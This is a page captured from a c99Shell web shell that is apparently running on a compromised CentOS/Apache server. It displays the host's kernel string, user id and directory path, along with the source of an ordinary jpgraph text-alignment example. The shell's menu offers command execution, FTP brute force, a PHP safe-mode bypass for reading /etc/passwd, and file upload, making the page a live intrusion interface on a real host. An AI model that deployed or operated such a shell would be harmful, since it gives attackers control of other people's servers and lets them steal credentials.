!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/src/Examples/   drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     textalignex1.php (1.97 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// $Id: textalignex1.php,v 1.1 2002/10/19 17:42:53 aditus Exp $
require_once "../jpgraph.php";
require_once 
"../jpgraph_canvas.php";

if( empty(
$_GET['a']) ) {
    
$angle=40;
}
else {
    
$angle=$_GET['a'];
}

$caption "Demonstration of different anchor points for texts as specified with\nTextAlign(). The red cross marks the coordinate that was given to\nstroke each instance of the string.\n(The green box is the bounding rectangle for the text.)";
$txt="TextAlign()";


// Initial width and height since we need a "dummy" canvas to
// calculate the height of the text strings
$w=480;$h=50;
$xm=90;$ym=80;

$g = new CanvasGraph($w,$h);

$aImg $g->img;
$aImg->SetFont(FF_ARIAL,FS_NORMAL,16);
$tw=$aImg->GetBBoxWidth($txt,$angle);
$th=$aImg->GetBBoxHeight($txt,$angle);

$aImg->SetFont(FF_ARIAL,FS_NORMAL,11);
$ch=$aImg->GetBBoxHeight($caption);

// Calculate needed height for the image
$h 3*$th+2*$ym $ch;
$g = new CanvasGraph($w,$h);
$aImg $g->img;

$prof = array('left','top',
          
'center','top',
          
'right','top',
          
'left','center',
          
'center','center',
          
'right','center',
          
'left','bottom',
          
'center','bottom',
          
'right','bottom');
$n count($prof)/2;

for( 
$i=0,$r=0,$c=0$i $n; ++$i ) {
    
$x $c*($tw+$xm)+$xm/2;
    
$y $r*($th+$ym)+$ym/2-10;
    
$aImg->SetColor('blue');
    
$aImg->SetTextAlign($prof[$i*2],$prof[$i*2+1]);            
    
$aImg->SetFont(FF_ARIAL,FS_NORMAL,16);
    
$aImg->StrokeText($x,$y,$txt,$angle,"left",true);

    
$aImg->SetColor('black');
    
$aImg->SetFont(FF_FONT1,FS_BOLD);
    
$aImg->SetTextAlign('center','top');            
    
$align sprintf('("%s","%s")',$prof[$i*2],$prof[$i*2+1]);
    
$aImg->StrokeText($c*($tw/2+$xm)+$xm/2+$tw/2,$r*($th/2+$ym)+$th+$ym/2-4,$align);
    
$c++;
    if( 
$c==) {
    
$c=0;$r++;
    }
}

$aImg->SetTextAlign('center','bottom');            
$aImg->SetFont(FF_ARIAL,FS_ITALIC,11);
$aImg->StrokeText($w/2,$h-10,$caption,0,'left');

$aImg->SetColor('navy');
$aImg->Rectangle(0,0,$w-1,$h-1);

$g->Stroke();

?>


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--